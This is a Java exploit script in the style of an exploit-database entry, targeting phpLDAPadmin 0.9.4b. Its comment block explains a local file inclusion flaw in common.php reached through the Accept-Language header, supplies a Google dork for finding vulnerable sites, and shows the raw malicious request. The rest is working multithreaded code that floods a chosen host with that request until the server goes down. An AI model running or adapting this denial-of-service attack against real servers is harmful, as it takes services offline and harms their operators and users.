/**

* Exploit Title: phpLDAPadmin 0.9.4b DoS

* Google Dork: "phpLDAPadmin - 0.9.4b"

* Date: 2011-10-23

* Author: Alguien

* Software Link: http://sourceforge.net/projects/phpldapadmin/files/phpldapadmin/0.9.4b/

* Version: 0.9.4b

* Tested on: Red Hat

* CVE : -

*

* Compilation:

* ------------

* $ javac phpldos.java

*

* Usage:

* ------

* $ java phpldos <host> <path> <threads>

*

* Example:

* --------

* $ java phpldos www.example.com /phpldapadmin/ 10

*

* Explanation:

* ------------

* The file "common.php" is vulnerable to LFI through the "Accept-Language"

* HTTP header.

*

* if( isset( $_SERVER['HTTP_ACCEPT_LANGUAGE'] ) ) {

* // get the languages which are spetcified in the HTTP header

* $HTTP_LANGS1 = preg_split ("/[;,]+/", $_SERVER['HTTP_ACCEPT_LANGUAGE'] );

* $HTTP_LANGS2 = preg_split ("/[;,]+/", $_SERVER['HTTP_ACCEPT_LANGUAGE'] );

* foreach( $HTTP_LANGS2 as $key => $value ) {

* $value=preg_split ("/[-]+/", $value );

* $HTTP_LANGS2[$key]=$value[0];

* }

*

* $HTTP_LANGS = array_merge ($HTTP_LANGS1, $HTTP_LANGS2);

* foreach( $HTTP_LANGS as $HTTP_LANG) {

* // try to grab one after the other the language file

* if( file_exists( realpath( "lang/recoded/$HTTP_LANG.php" ) ) &&

* is_readable( realpath( "lang/recoded/$HTTP_LANG.php" ) ) ) {

* ob_start();

* include realpath( "lang/recoded/$HTTP_LANG.php" );

* ob_end_clean();

* break;

* }

* }

* }

*

* This exploit sends "../../common" in the Accept-Language header in order to

* generate a recursive inclusions and cause a denial of service via resource

* exhaustion.

*

* GET /phpldapadmin/common.php HTTP/1.1\r\n

* Host: www.example.com\r\n

* Accept-Language: ../../common\r\n

* Connection: close\r\n

* \r\n

*

*/

import java.io.PrintStream;

import java.net.InetSocketAddress;

import java.net.Socket;

class phpldos implements Runnable {

public static final int HTTP_PORT = 80;

public static final int TIMEOUT = 10000;

private static String host;

private static String path;

private Socket sk;

private PrintStream ps;

public void run() {

while (true) {

if (!open_connection()) {

System.out.println("[+] Mission complete. Server is down };]");

break;

}

send_attack();

try {

ps.close();

sk.close();

} catch (Exception e) {

// D'oh!

}

}

}

private boolean open_connection() {

try {

sk = new Socket();

sk.connect(new InetSocketAddress(host, HTTP_PORT), TIMEOUT);

ps = new PrintStream(sk.getOutputStream());

} catch (Exception e) {

return false;

}

return true;

}

private void send_attack() {

try {

String message = ""

+ "GET " + path + "common.php HTTP/1.1\r\n"

+ "Host: " + host + "\r\n"

+ "Accept-Language: ../../common\r\n"

+ "Connection: close\r\n"

+ "\r\n";

ps.print(message);

} catch (Exception e) {

// D'oh!

}

}

public static void main(String[] args) {

if (args.length != 3) {

usage();

}

host = args[0];

path = args[1];

int threads = Integer.parseInt(args[2]);

System.out.println("[+] Attacking with " + threads + " threads.");

for (int i = 0; i < threads; i++) {

new Thread(new phpldos()).start();

}

}

public static void usage() {

System.out.print(

"###########################################################\n"

+ "# phpLDAPadmin DoS #\n"

+ "# by: Alguien - http://alguienenlafisi.blogspot.com #\n"

+ "###########################################################\n"

+ "Syntax : java phpldos <host> <path> <threads>\n"

+ "Example : java phpldos www.example.com /phpldapadmin/ 10\n\n");

System.exit(1);

}

}